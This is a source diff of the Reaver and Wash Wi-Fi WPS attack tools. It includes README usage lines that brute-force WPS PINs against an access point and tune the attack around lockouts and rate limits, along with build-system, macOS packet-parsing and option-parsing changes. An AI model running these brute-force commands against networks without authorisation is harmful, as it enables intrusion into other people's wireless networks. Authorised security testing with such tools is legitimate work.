39 | # reaver -i mon0 -b 00:01:02:03:04:05 -d 0 | |
39 | # reaver -i wlan0mon -b 00:01:02:03:04:05 -d 0 | |
40 | 40 | |
41 | 41 | Some APs will temporarily lock their WPS state, typically for five minutes or less, when "suspicious" |
42 | 42 | activity is detected. By default when a locked state is detected, Reaver will check the state every |
43 | 43 | 315 seconds (5 minutes and 15 seconds) and not continue brute forcing pins until the WPS state is unlocked. |
44 | 44 | This check can be increased or decreased to any non-negative integer value: |
45 | 45 | |
46 | # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250 | |
46 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --lock-delay=250 | |
47 | 47 | |
48 | 48 | The default timeout period for receiving the M5 and M7 WPS response messages is .1 seconds. This |
49 | 49 | timeout period can be set manually if necessary (max timeout period is 1 second): |
50 | 50 | |
51 | # reaver -i mon0 -b 00:01:02:03:04:05 -T .5 | |
51 | # reaver -i wlan0mon -b 00:01:02:03:04:05 -T .5 | |
52 | 52 | |
53 | 53 | Some poor WPS implementations will drop a connection on the floor when an invalid pin is supplied |
54 | 54 | instead of responding with a NACK message as the specs dictate. To account for this, if an M5/M7 timeout |
56 | 56 | NACKS (most do), this feature can be disabled to ensure better reliability. This option is largely useless |
57 | 57 | as Reaver will auto-detect if an AP properly responds with NACKs or not: |
58 | 58 | |
59 | # reaver -i mon0 -b 00:01:02:03:04:05 --nack | |
59 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --nack | |
60 | 60 | |
61 | 61 | While most APs don't care, sending an EAP FAIL message to close out a WPS session is sometimes necessary. |
62 | 62 | By default this feature is disabled, but can be enabled for those APs that need it: |
63 | 63 | |
64 | # reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate | |
64 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --eap-terminate | |
65 | 65 | |
66 | 66 | When 10 consecutive unexpected WPS errors are encountered, a warning message will be displayed. Since this |
67 | 67 | may be a sign that the AP is rate limiting pin attempts or simply being overloaded, a sleep can be put in |
68 | 68 | place that will occur whenever these warning messages appear: |
69 | 69 | |
70 | # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360 | |
70 | # reaver -i wlan0mon -b 00:01:02:03:04:05 --fail-wait=360 |
1 | 1 | |
2 | 2 | Wash is a utility for identifying WPS enabled access points. It can survey from a live interface: |
3 | 3 | |
4 | # wash -i mon0 | |
4 | # wash -i wlan0mon | |
5 | 5 | |
6 | 6 | Or it can scan a list of pcap files: |
7 | 7 | |
19 | 19 | By default, wash will perform a passive survey. However, wash can be instructed to send probe requests |
20 | 20 | to each AP in order to obtain more information about the AP: |
21 | 21 | |
22 | # wash -i mon0 --scan | |
22 | # wash -i wlan0mon --scan | |
23 | 23 | |
24 | 24 | By sending probe requests, wash will illicit a probe response from each AP. For WPS-capable APs, the |
25 | 25 | WPS information element typically contains additional information about the AP, including make, model, |
38 | 38 | const u_char *packet = NULL; |
39 | 39 | |
40 | 40 | /* Loop until we get a valid packet, or until we run out of packets */ |
41 | #ifdef __APPLE__ | |
42 | struct pcap_pkthdr *pkt_header = NULL; | |
43 | int status = 1; | |
44 | while ((status = pcap_next_ex(get_handle(), &pkt_header, &packet)) == 1 || status == 0) // status == 0 indicates timeout | |
45 | #else | |
41 | 46 | while((packet = pcap_next(get_handle(), header)) != NULL) |
42 | { | |
47 | #endif | |
48 | { | |
49 | ||
50 | #ifdef __APPLE__ | |
51 | if (status == 0) continue; | |
52 | memcpy(header, pkt_header, sizeof(*header)); | |
53 | #endif | |
54 | ||
43 | 55 | if(get_validate_fcs()) |
44 | 56 | { |
45 | 57 | if(check_fcs(packet, header->len)) |
48 | 60 | } |
49 | 61 | else |
50 | 62 | { |
63 | #ifndef __APPLE__ | |
51 | 64 | cprintf(INFO, "[!] Found packet with bad FCS, skipping...\n"); |
65 | #endif | |
52 | 66 | } |
53 | 67 | } |
54 | 68 | else |
72 | 86 | struct dot11_frame_header *frame_header = NULL; |
73 | 87 | struct beacon_management_frame *beacon = NULL; |
74 | 88 | int channel = 0; |
75 | size_t tag_offset = 0; | |
76 | 89 | time_t start_time = 0; |
77 | 90 | |
78 | 91 | set_ap_capability(0); |
99 | 112 | set_ap_capability(beacon->capability); |
100 | 113 | |
101 | 114 | /* Obtain the SSID and channel number from the beacon packet */ |
102 | tag_offset = rt_header->len + sizeof(struct dot11_frame_header) + sizeof(struct beacon_management_frame); | |
103 | 115 | channel = parse_beacon_tags(packet, header.len); |
104 | 116 | |
105 | 117 | /* If no channel was manually specified, switch to the AP's current channel */ |
608 | 620 | if(has_rt_header()) |
609 | 621 | { |
610 | 622 | rt_header = (struct radio_tap_header *) packet; |
623 | ||
624 | #ifdef __APPLE__ | |
625 | unsigned char *body = (unsigned char*) (rt_header+1); | |
626 | uint32_t present = rt_header->flags; | |
627 | uint8_t rflags = 0; | |
628 | int i; | |
629 | for (i = IEEE80211_RADIOTAP_TSFT; i <= IEEE80211_RADIOTAP_EXT; i++) { | |
630 | if (!(present & (1 << i))) continue; | |
631 | switch (i) { | |
632 | case IEEE80211_RADIOTAP_TSFT: | |
633 | body += sizeof(uint64_t); | |
634 | break; | |
635 | ||
636 | case IEEE80211_RADIOTAP_FLAGS: | |
637 | rflags = *((uint8_t*)body); | |
638 | /* fall through */ | |
639 | case IEEE80211_RADIOTAP_RATE: | |
640 | body += sizeof(uint8_t); | |
641 | break; | |
642 | ||
643 | case IEEE80211_RADIOTAP_CHANNEL: | |
644 | body += sizeof(uint16_t)*2; | |
645 | break; | |
646 | ||
647 | case IEEE80211_RADIOTAP_RX_FLAGS: | |
648 | case IEEE80211_RADIOTAP_FHSS: | |
649 | body += sizeof(uint16_t); | |
650 | break; | |
651 | ||
652 | case IEEE80211_RADIOTAP_DB_ANTSIGNAL: | |
653 | case IEEE80211_RADIOTAP_DBM_ANTNOISE: | |
654 | case IEEE80211_RADIOTAP_DBM_ANTSIGNAL: | |
655 | case IEEE80211_RADIOTAP_DB_ANTNOISE: | |
656 | case IEEE80211_RADIOTAP_ANTENNA: | |
657 | body++; | |
658 | break; | |
659 | ||
660 | case 18: // IEEE80211_RADIOTAP_XCHANNEL | |
661 | body += sizeof(uint32_t); | |
662 | body += sizeof(uint16_t); | |
663 | body += sizeof(uint8_t); | |
664 | body += sizeof(uint8_t); | |
665 | break; | |
666 | ||
667 | case 19: // IEEE80211_RADIOTAP_MCS | |
668 | body += 3*sizeof(uint8_t); | |
669 | break; | |
670 | ||
671 | default: | |
672 | i = IEEE80211_RADIOTAP_EXT+1; | |
673 | break; | |
674 | } | |
675 | } | |
676 | #define IEEE80211_RADIOTAP_F_BADFCS 0x40 | |
677 | if (rflags & IEEE80211_RADIOTAP_F_BADFCS) { | |
678 | // bad FCS, ignore | |
679 | return 0; | |
680 | } | |
681 | if (!(rflags & IEEE80211_RADIOTAP_F_FCS)) { | |
682 | // fcs not always present | |
683 | return 1; | |
684 | } | |
685 | #endif | |
686 | ||
611 | 687 | offset += rt_header->len; |
612 | 688 | } |
613 | 689 |
35 | 35 | |
36 | 36 | #include "defs.h" |
37 | 37 | #include "globule.h" |
38 | #include <libwps.h> | |
38 | 39 | #include "argsparser.h" |
39 | #include "sql.h" | |
40 | 40 | #include "builder.h" |
41 | 41 | #include "iface.h" |
42 | 42 | #include "crc.h" |
43 | 43 | #include "wps.h" |
44 | ||
45 | #ifdef __APPLE__ | |
46 | #include "utils/radiotap.h" | |
47 | #endif | |
44 | 48 | |
45 | 49 | #define AUTH_OK 1 |
46 | 50 | #define ASSOCIATE_OK 2 |
0 | 0 | CC=@CC@ |
1 | LIBWPS_DIR=libwps | |
2 | INC=-I$(LIBWPS_DIR) | |
1 | INC=-Ilibwps -I. | |
3 | 2 | prefix=@prefix@ |
4 | 3 | exec_prefix=@exec_prefix@ |
5 | 4 | CONFDIR=@sysconfdir@/@target@ |
6 | CFLAGS=-DCONF_DIR='"$(CONFDIR)"' -DREAVER_DATABASE='"$(CONFDIR)/reaver.db"' @CFLAGS@ | |
7 | LDFLAGS=$(LIBWPS_DIR)/*.o wps/*.o tls/bignum.o tls/libtls.a utils/libutils.a crypto/libcrypto.a lwe/libiw.a @LDFLAGS@ | |
5 | CFLAGS=-DCONF_DIR='"$(CONFDIR)"' @CFLAGS@ -Wno-unused-function | |
6 | ||
7 | WPS_OBJS=wps/wps_attr_build.o wps/wps_attr_parse.o wps/wps_attr_process.o \ | |
8 | wps/wps.o wps/wps_common.o wps/wps_dev_attr.o wps/wps_enrollee.o \ | |
9 | wps/wps_registrar.o wps/wps_ufd.o | |
10 | ||
11 | ||
12 | LIB_OBJS=libwps/libwps.o $(WPS_OBJS) utils/libutils.a \ | |
13 | crypto/libcrypto.a tls/libtls.a | |
14 | ||
15 | LDFLAGS=@LDFLAGS@ | |
16 | UNAME := $(shell uname) | |
17 | ||
18 | ifeq ($(UNAME), Darwin) | |
19 | LIBIWNAME= | |
20 | else | |
21 | LIB_OBJS+=lwe/libiw.a | |
22 | LIBIWNAME=libiw | |
23 | endif | |
24 | ||
25 | WASH_OBJS=globule.o init.o misc.o 80211.o iface.o \ | |
26 | builder.o crc.o | |
27 | REAVER_OBJS=argsparser.o globule.o init.o sigint.o iface.o sigalrm.o \ | |
28 | misc.o cracker.o session.o send.o pins.o 80211.o exchange.o builder.o \ | |
29 | keys.o crc.o | |
8 | 30 | |
9 | 31 | all: wash reaver |
10 | 32 | |
11 | wash: wps libiw libwps.o argsparser.o globule.o init.o misc.o 80211.o iface.o | |
12 | $(CC) $(CFLAGS) $(INC) wpsmon.c *.o $(LDFLAGS) -o wash | |
33 | $(WPS_OBJS): CFLAGS+=-I. -Iutils | |
13 | 34 | |
14 | reaver: wps libiw libwps.o argsparser.o globule.o init.o sigint.o sigalrm.o misc.o cracker.o | |
15 | $(CC) $(CFLAGS) $(INC) wpscrack.c *.o $(LDFLAGS) -o reaver | |
35 | wash: $(LIBIWNAME) $(WASH_OBJS) $(LIB_OBJS) | |
36 | $(CC) $(CFLAGS) $(INC) wpsmon.c $(WASH_OBJS) $(LIB_OBJS) $(LDFLAGS) -o wash | |
16 | 37 | |
17 | libwps.o: | |
18 | (cd $(LIBWPS_DIR) && make) | |
38 | reaver: $(LIBIWNAME) $(REAVER_OBJS) $(LIB_OBJS) | |
39 | $(CC) $(CFLAGS) $(INC) wpscrack.c $(REAVER_OBJS) $(LIB_OBJS) $(LDFLAGS) -o reaver | |
19 | 40 | |
20 | wps: libutils libcrypto | |
21 | (cd wps && make) | |
41 | utils/libutils.a: | |
42 | (cd utils && $(MAKE)) | |
22 | 43 | |
23 | libutils: | |
24 | (cd utils && make) | |
44 | crypto/libcrypto.a: tls/libtls.a | |
45 | (cd crypto && $(MAKE)) | |
25 | 46 | |
26 | libcrypto: libtls | |
27 | (cd crypto && make) | |
28 | ||
29 | libtls: | |
30 | (cd tls && make) | |
47 | tls/libtls.a: | |
48 | (cd tls && $(MAKE)) | |
31 | 49 | |
32 | 50 | libiw: |
33 | (cd lwe && make BUILD_STATIC=y libiw.a) | |
51 | (cd lwe && $(MAKE) BUILD_STATIC=y libiw.a) | |
34 | 52 | |
35 | 53 | init.o: |
36 | 54 | $(CC) $(CFLAGS) init.c -c |
37 | ||
38 | sql.o: | |
39 | $(CC) $(CFLAGS) $(INC) sql.c -c | |
40 | 55 | |
41 | 56 | crc.o: |
42 | 57 | $(CC) $(CFLAGS) crc.c -c |
59 | 74 | session.o: globule.o |
60 | 75 | $(CC) $(CFLAGS) $(INC) session.c -c |
61 | 76 | |
62 | 80211.o: globule.o sql.o builder.o crc.o | |
77 | 80211.o: globule.o builder.o crc.o | |
63 | 78 | $(CC) $(CFLAGS) $(INC) 80211.c -c |
64 | 79 | |
65 | 80 | iface.o: globule.o |
83 | 98 | globule.o: |
84 | 99 | $(CC) $(CFLAGS) globule.c -c |
85 | 100 | |
86 | install: cleanbin | |
87 | if [ ! -d $(CONFDIR) ]; then mkdir -p $(CONFDIR); fi | |
88 | if [ ! -e $(CONFDIR)/reaver.db ]; then cp reaver.db $(CONFDIR)/reaver.db && chmod -R a+rw $(CONFDIR); fi | |
89 | if [ -e wash ]; then cp wash @bindir@/wash; fi | |
90 | if [ -e reaver ]; then cp reaver @bindir@/reaver; fi | |
101 | install: all | |
102 | install -d $(DESTDIR)$(CONFDIR) | |
103 | install -Dm 755 wash $(DESTDIR)@bindir@/wash | |
104 | install -Dm 755 reaver $(DESTDIR)@bindir@/reaver | |
91 | 105 | |
92 | 106 | clean: |
93 | 107 | rm -f *~ *.o reaver wash |
94 | 108 | rm -rf *.cache config.status config.log |
95 | (cd utils && make clean) | |
96 | (cd tls && make clean) | |
97 | (cd crypto && make clean) | |
98 | (cd wps && make clean) | |
99 | (cd lwe && make realclean) | |
100 | (cd $(LIBWPS_DIR) && make clean) | |
109 | rm -f $(LIB_OBJS) | |
110 | (cd utils && $(MAKE) clean) | |
111 | (cd tls && $(MAKE) clean) | |
112 | (cd crypto && $(MAKE) clean) | |
113 | (cd lwe && $(MAKE) realclean) | |
101 | 114 | rm -f Makefile config.h |
102 | 115 | |
103 | cleanbin: | |
104 | rm -f @bindir@/reaver @bindir@/wash @bindir@/walsh | |
116 | distclean: clean | |
105 | 117 | |
106 | distclean: cleanbin clean | |
107 | rm -rf $(CONFDIR) | |
118 | .PHONY: libiw clean distclean install |
0 | 0 | /* |
1 | 1 | * Reaver - Command line processing functions |
2 | 2 | * Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]> |
3 | * Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]> | |
3 | 4 | * |
4 | 5 | * This program is free software; you can redistribute it and/or modify |
5 | 6 | * it under the terms of the GNU General Public License as published by |
31 | 32 | */ |
32 | 33 | |
33 | 34 | #include "argsparser.h" |
35 | #include "globule.h" | |
34 | 36 | |
35 | 37 | /* Processes Reaver command line options */ |
36 | 38 | int process_arguments(int argc, char **argv) |
38 | 40 | int ret_val = EXIT_SUCCESS; |
39 | 41 | int c = 0, channel = 0; |
40 | 42 | int long_opt_index = 0; |
43 | FILE *out_file; | |
41 | 44 | char bssid[MAC_ADDR_LEN] = { 0 }; |
42 | 45 | char mac[MAC_ADDR_LEN] = { 0 }; |
43 | char *short_options = "W:K:b:e:m:i:t:d:c:T:x:r:g:l:o:p:s:C:1:2:ZaA5ELfnqvDShwXNP0"; | |
46 | char *short_options = "W:K:b:e:m:i:t:d:c:T:x:r:g:l:o:p:s:C:1:2:F:R:ZA5ELfnqvDShwXNPH0I"; | |
44 | 47 | struct option long_options[] = { |
45 | 48 | { "generate-pin", required_argument, NULL, 'W' }, |
46 | 49 | { "stop-in-m1", no_argument, NULL, '0' }, |
54 | 57 | { "m57-timeout", required_argument, NULL, 'T' }, |
55 | 58 | { "delay", required_argument, NULL, 'd' }, |
56 | 59 | { "lock-delay", required_argument, NULL, 'l' }, |
60 | { "fake-delay", required_argument, NULL, 'F' }, | |
61 | { "fake-reason", required_argument, NULL, 'R' }, | |
62 | { "ignore-reason", no_argument, NULL, 'I' }, | |
57 | 63 | { "fail-wait", required_argument, NULL, 'x' }, |
58 | 64 | { "channel", required_argument, NULL, 'c' }, |
59 | 65 | { "session", required_argument, NULL, 's' }, |
69 | 75 | { "no-nacks", no_argument, NULL, 'N' }, |
70 | 76 | { "eap-terminate", no_argument, NULL, 'E' }, |
71 | 77 | { "dh-small", no_argument, NULL, 'S' }, |
72 | { "auto", no_argument, NULL, 'a' }, | |
73 | 78 | { "fixed", no_argument, NULL, 'f' }, |
74 | 79 | { "daemonize", no_argument, NULL, 'D' }, |
75 | 80 | { "5ghz", no_argument, NULL, '5' }, |
80 | 85 | { "exhaustive", no_argument, NULL, 'X' }, |
81 | 86 | { "help", no_argument, NULL, 'h' }, |
82 | 87 | { "pixiedust-loop", no_argument, NULL, 'P' }, |
88 | { "pixiedust-log", no_argument, NULL, 'H' }, | |
83 | 89 | { 0, 0, 0, 0 } |
84 | 90 | }; |
85 | 91 | |
86 | 92 | /* Since this function may be called multiple times, be sure to set opt index to 0 each time */ |
87 | 93 | optind = 0; |
94 | opterr = 0; | |
88 | 95 | |
89 | 96 | while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1) |
90 | 97 | { |
91 | 98 | switch(c) |
92 | 99 | { |
93 | case 'W': | |
94 | //set valor para auto get pass | |
100 | case 'W': | |
101 | //set default pin generator | |
95 | 102 | set_op_gen_pin(atoi(optarg)); |
96 | 103 | break; |
97 | 104 | case '0': |
98 | //set valor para auto get pass | |
105 | //set stop in m1 | |
99 | 106 | set_stop_in_m1(1); |
100 | 107 | break; |
101 | 108 | case 'Z': |
118 | 125 | set_iface(optarg); |
119 | 126 | break; |
120 | 127 | case 'b': |
121 | str2mac((unsigned char *) optarg, (unsigned char *) &bssid); | |
128 | str2mac(optarg, (unsigned char *) &bssid); | |
122 | 129 | set_bssid((unsigned char *) &bssid); |
123 | 130 | break; |
124 | 131 | case 'e': |
125 | 132 | set_ssid(optarg); |
126 | 133 | break; |
127 | 134 | case 'm': |
128 | str2mac((unsigned char *) optarg, (unsigned char *) &mac); | |
135 | str2mac(optarg, (unsigned char *) &mac); | |
129 | 136 | set_mac((unsigned char *) &mac); |
130 | 137 | break; |
131 | 138 | case 't': |
168 | 175 | case 'L': |
169 | 176 | set_ignore_locks(1); |
170 | 177 | break; |
171 | case 'a': | |
172 | set_auto_detect_options(1); | |
173 | break; | |
174 | 178 | case 'o': |
175 | set_log_file(fopen(optarg, "w")); | |
179 | out_file = fopen(optarg, "w"); | |
180 | if (out_file != NULL) { | |
181 | set_log_file(out_file); | |
182 | } else { | |
183 | fprintf(stderr, "[-] Cannot write to log file!\n"); | |
184 | ret_val = EXIT_FAILURE; | |
185 | } | |
176 | 186 | break; |
177 | 187 | case 'x': |
178 | 188 | set_fail_delay(atoi(optarg)); |
181 | 191 | parse_recurring_delay(optarg); |
182 | 192 | break; |
183 | 193 | case 'g': |
184 | set_max_pin_attempts(atoi(optarg)); | |
194 | set_quit_pin_attempts(atoi(optarg)); | |
185 | 195 | break; |
186 | 196 | case 'D': |
187 | 197 | daemonize(); |
215 | 225 | break; |
216 | 226 | case 'P': |
217 | 227 | set_pixie_loop(1); |
228 | break; | |
229 | case 'H': | |
230 | set_pixie_log(1); | |
231 | break; | |
232 | case 'F': | |
233 | set_fake_nack_delay( atoi(optarg) ); | |
234 | break; | |
235 | case 'I': | |
236 | set_ignore_nack_reason(1); | |
237 | break; | |
238 | case 'R': | |
239 | set_fake_nack_reason( strtol(optarg, NULL, 0) ); | |
240 | set_ignore_nack_reason(1); | |
218 | 241 | break; |
219 | 242 | default: |
220 | 243 | ret_val = EXIT_FAILURE; |
236 | 259 | set_max_pin_attempts(P1_SIZE + P2_SIZE); |
237 | 260 | set_delay(DEFAULT_DELAY); |
238 | 261 | set_lock_delay(DEFAULT_LOCK_DELAY); |
262 | set_fake_nack_delay(DEFAULT_FK_NACK_DELAY); | |
263 | set_last_nack_reason(-1); | |
264 | set_fake_nack_reason(-1); | |
265 | set_ignore_nack_reason(0); | |
239 | 266 | set_key_status(KEY1_WIP); |
240 | 267 | set_debug(INFO); |
241 | 268 | set_auto_channel_select(1); |
247 | 274 | set_op_pixie(0); |
248 | 275 | set_op_autopass(1); |
249 | 276 | set_pixie_loop(0); |
250 | set_stop_in_m1(0); | |
251 | set_op_gen_pin(0); | |
277 | set_pixie_log(0); | |
278 | set_stop_in_m1(0); | |
279 | set_op_gen_pin(0); | |
280 | set_quit_pin_attempts(-1); | |
252 | 281 | } |
253 | 282 | |
254 | 283 | /* Parses the recurring delay optarg */ |
301 | 330 | } |
302 | 331 | } |
303 | 332 | |
304 | /* Process auto-applied options from the database. read_ap_beacon should be called before this. */ | |
305 | void process_auto_options(void) | |
306 | { | |
307 | char **argv = NULL; | |
308 | int argc = 0, i = 0; | |
309 | char *bssid = NULL, *ssid = NULL; | |
310 | ||
311 | if(get_auto_detect_options()) | |
312 | { | |
313 | bssid = (char *) mac2str(get_bssid(), ':'); | |
314 | ||
315 | ||
316 | if(bssid) | |
317 | { | |
318 | /* If we didn't get the SSID from the beacon packet, check the database */ | |
319 | if(get_ssid() == NULL) | |
320 | { | |
321 | ssid = get_db_ssid(bssid); | |
322 | if(ssid) | |
323 | { | |
324 | set_ssid(ssid); | |
325 | free(ssid); | |
326 | } | |
327 | } | |
328 | ||
329 | argv = auto_detect_settings(bssid, &argc); | |
330 | if(argc > 1 && argv != NULL) | |
331 | { | |
332 | /* Process the command line arguments */ | |
333 | process_arguments(argc, argv); | |
334 | ||
335 | /* Clean up argument memory allocation */ | |
336 | for(i=0; i<argc; i++) | |
337 | { | |
338 | free(argv[i]); | |
339 | } | |
340 | free(argv); | |
341 | } | |
342 | ||
343 | free(bssid); | |
344 | } | |
345 | } | |
346 | ||
347 | return; | |
348 | } |
37 | 37 | #include <getopt.h> |
38 | 38 | #include "defs.h" |
39 | 39 | #include "iface.h" |
40 | #include "sql.h" | |
41 | 40 | #include "config.h" |
42 | 41 | |
43 | 42 | int process_arguments(int argc, char **argv); |
44 | 43 | void init_default_settings(void); |
45 | 44 | void parse_recurring_delay(char *arg); |
46 | 45 | void parse_static_pin(char *pin); |
47 | void process_auto_options(void); | |
48 | 46 | |
49 | 47 | #endif |
0 | 0 | #! /bin/sh |
1 | 1 | # Guess values for system-dependent variables and create Makefiles. |
2 | # Generated by GNU Autoconf 2.69 for reaver 1.5. | |
2 | # Generated by GNU Autoconf 2.69 for reaver 1.5.3. | |
3 | 3 | # |
4 | 4 | # |
5 | 5 | # Copyright (C) 1992-1996, 1998-2012 Free Software Foundation, Inc. |
576 | 576 | # Identity of this package. |
577 | 577 | PACKAGE_NAME='reaver' |
578 | 578 | PACKAGE_TARNAME='reaver' |
579 | PACKAGE_VERSION='1.5.2' | |
580 | PACKAGE_STRING='reaver 1.5.2' | |
579 | PACKAGE_VERSION='1.5.3' | |
580 | PACKAGE_STRING='reaver 1.5.3' | |
581 | 581 | PACKAGE_BUGREPORT='' |
582 | 582 | PACKAGE_URL='' |
583 | 583 | |
671 | 671 | ac_subst_files='' |
672 | 672 | ac_user_opts=' |
673 | 673 | enable_option_checking |
674 | enable_savetocurrent | |
674 | 675 | ' |
675 | 676 | ac_precious_vars='build_alias |
676 | 677 | host_alias |
1221 | 1222 | # Omit some internal or obsolete options to make the list less imposing. |
1222 | 1223 | # This message is too long to be a string in the A/UX 3.1 sh. |
1223 | 1224 | cat <<_ACEOF |
1224 | \`configure' configures reaver 1.5 to adapt to many kinds of systems. | |
1225 | \`configure' configures reaver 1.5.3 to adapt to many kinds of systems. | |
1225 | 1226 | |
1226 | 1227 | Usage: $0 [OPTION]... [VAR=VALUE]... |
1227 | 1228 | |
1282 | 1283 | |
1283 | 1284 | if test -n "$ac_init_help"; then |
1284 | 1285 | case $ac_init_help in |
1285 | short | recursive ) echo "Configuration of reaver 1.5:";; | |
1286 | short | recursive ) echo "Configuration of reaver 1.5.3:";; | |
1286 | 1287 | esac |
1287 | 1288 | cat <<\_ACEOF |
1289 | ||
1290 | Optional Features: | |
1291 | --disable-option-checking ignore unrecognized --enable/--with options | |
1292 | --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) | |
1293 | --enable-FEATURE[=ARG] include FEATURE [ARG=yes] | |
1294 | --enable-savetocurrent saves the current session file to the directory | |
1295 | reaver was started from | |
1296 | ||
1288 | 1297 | |
1289 | 1298 | Some influential environment variables: |
1290 | 1299 | CC C compiler command |
1362 | 1371 | test -n "$ac_init_help" && exit $ac_status |
1363 | 1372 | if $ac_init_version; then |
1364 | 1373 | cat <<\_ACEOF |
1365 | reaver configure 1.5 | |
1374 | reaver configure 1.5.3 | |
1366 | 1375 | generated by GNU Autoconf 2.69 |
1367 | 1376 | |
1368 | 1377 | Copyright (C) 2012 Free Software Foundation, Inc. |
1660 | 1669 | This file contains any messages produced by compilers while |
1661 | 1670 | running configure, to aid debugging if configure makes a mistake. |
1662 | 1671 | |
1663 | It was created by reaver $as_me 1.5, which was | |
1672 | It was created by reaver $as_me 1.5.3, which was | |
1664 | 1673 | generated by GNU Autoconf 2.69. Invocation command line was |
1665 | 1674 | |
1666 | 1675 | $ $0 $@ |
2806 | 2815 | |
2807 | 2816 | |
2808 | 2817 | CFLAGS="-Wall $CFLAGS" |
2809 | LDFLAGS="-ldl -lm -lpcap -lsqlite3 $LDFLAGS" | |
2818 | LDFLAGS="-lm -lpcap $LDFLAGS" | |
2810 | 2819 | |
2811 | 2820 | |
2812 | 2821 | { $as_echo "$as_me:${as_lineno-$LINENO}: checking for pcap_open_live in -lpcap" >&5 |
2854 | 2863 | |
2855 | 2864 | else |
2856 | 2865 | echo "error: pcap library not found!"; exit -1 |
2857 | fi | |
2858 | ||
2859 | { $as_echo "$as_me:${as_lineno-$LINENO}: checking for sqlite3_open in -lsqlite3" >&5 | |
2860 | $as_echo_n "checking for sqlite3_open in -lsqlite3... " >&6; } | |
2861 | if ${ac_cv_lib_sqlite3_sqlite3_open+:} false; then : | |
2862 | $as_echo_n "(cached) " >&6 | |
2863 | else | |
2864 | ac_check_lib_save_LIBS=$LIBS | |
2865 | LIBS="-lsqlite3 $LIBS" | |
2866 | cat confdefs.h - <<_ACEOF >conftest.$ac_ext | |
2867 | /* end confdefs.h. */ | |
2868 | ||
2869 | /* Override any GCC internal prototype to avoid an error. | |
2870 | Use char because int might match the return type of a GCC | |
2871 | builtin and then its argument prototype would still apply. */ | |
2872 | #ifdef __cplusplus | |
2873 | extern "C" | |
2874 | #endif | |
2875 | char sqlite3_open (); | |
2876 | int | |
2877 | main () | |
2878 | { | |
2879 | return sqlite3_open (); | |
2880 | ; | |
2881 | return 0; | |
2882 | } | |
2883 | _ACEOF | |
2884 | if ac_fn_c_try_link "$LINENO"; then : | |
2885 | ac_cv_lib_sqlite3_sqlite3_open=yes | |
2886 | else | |
2887 | ac_cv_lib_sqlite3_sqlite3_open=no | |
2888 | fi | |
2889 | rm -f core conftest.err conftest.$ac_objext \ | |
2890 | conftest$ac_exeext conftest.$ac_ext | |
2891 | LIBS=$ac_check_lib_save_LIBS | |
2892 | fi | |
2893 | { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_sqlite3_sqlite3_open" >&5 | |
2894 | $as_echo "$ac_cv_lib_sqlite3_sqlite3_open" >&6; } | |
2895 | if test "x$ac_cv_lib_sqlite3_sqlite3_open" = xyes; then : | |
2896 | cat >>confdefs.h <<_ACEOF | |
2897 | #define HAVE_LIBSQLITE3 1 | |
2898 | _ACEOF | |
2899 | ||
2900 | LIBS="-lsqlite3 $LIBS" | |
2901 | ||
2902 | else | |
2903 | echo "error: sqlite3 library not found!"; exit -1 | |
2904 | 2866 | fi |
2905 | 2867 | |
2906 | 2868 | ac_ext=c |
3324 | 3286 | _ACEOF |
3325 | 3287 | |
3326 | 3288 | else |
3327 | echo "error: missing sqlite3 header files" && exit -1 | |
3289 | echo "error: missing pcap header files" && exit -1 | |
3328 | 3290 | fi |
3329 | 3291 | |
3330 | 3292 | done |
3331 | 3293 | |
3332 | for ac_header in sqlite3.h | |
3333 | do : | |
3334 | ac_fn_c_check_header_mongrel "$LINENO" "sqlite3.h" "ac_cv_header_sqlite3_h" "$ac_includes_default" | |
3335 | if test "x$ac_cv_header_sqlite3_h" = xyes; then : | |
3336 | cat >>confdefs.h <<_ACEOF | |
3337 | #define HAVE_SQLITE3_H 1 | |
3338 | _ACEOF | |
3339 | ||
3340 | else | |
3341 | echo "error: missing sqlite3 header files" && exit -1 | |
3342 | fi | |
3343 | ||
3344 | done | |
3294 | ||
3295 | # Check whether --enable-savetocurrent was given. | |
3296 | if test "${enable_savetocurrent+set}" = set; then : | |
3297 | enableval=$enable_savetocurrent; CFLAGS="$CFLAGS -DSAVETOCURRENT" | |
3298 | fi | |
3345 | 3299 | |
3346 | 3300 | |
3347 | 3301 | cp confdefs.h config.h |
3892 | 3846 | # report actual input values of CONFIG_FILES etc. instead of their |
3893 | 3847 | # values after options handling. |
3894 | 3848 | ac_log=" |
3895 | This file was extended by reaver $as_me 1.5, which was | |
3849 | This file was extended by reaver $as_me 1.5.3, which was | |
3896 | 3850 | generated by GNU Autoconf 2.69. Invocation command line was |
3897 | 3851 | |
3898 | 3852 | CONFIG_FILES = $CONFIG_FILES |
3945 | 3899 | cat >>$CONFIG_STATUS <<_ACEOF || ac_write_fail=1 |
3946 | 3900 | ac_cs_config="`$as_echo "$ac_configure_args" | sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`" |
3947 | 3901 | ac_cs_version="\\ |
3948 | reaver config.status 1.5 | |
3902 | reaver config.status 1.5.3 | |
3949 | 3903 | configured by $0, generated by GNU Autoconf 2.69, |
3950 | 3904 | with options \\"\$ac_cs_config\\" |
3951 | 3905 |
0 | AC_INIT(reaver, 1.5) | |
0 | AC_INIT(reaver, 1.5.3) | |
1 | 1 | |
2 | 2 | AC_PROG_CC |
3 | 3 | AC_LANG(C) |
4 | 4 | |
5 | 5 | CFLAGS="-Wall $CFLAGS" |
6 | LDFLAGS="-ldl -lm -lpcap -lsqlite3 $LDFLAGS" | |
6 | LDFLAGS="-lm -lpcap $LDFLAGS" | |
7 | 7 | |
8 | 8 | AC_CHECK_LIB(pcap, pcap_open_live, [], [echo "error: pcap library not found!"; exit -1]) |
9 | AC_CHECK_LIB(sqlite3, sqlite3_open, [], [echo "error: sqlite3 library not found!"; exit -1]) | |
10 | 9 | AC_CHECK_HEADERS([stdlib.h stdint.h string.h],[],[echo "error: missing standard header files" && exit -1]) |
11 | AC_CHECK_HEADERS([pcap.h],[],[echo "error: missing sqlite3 header files" && exit -1]) | |
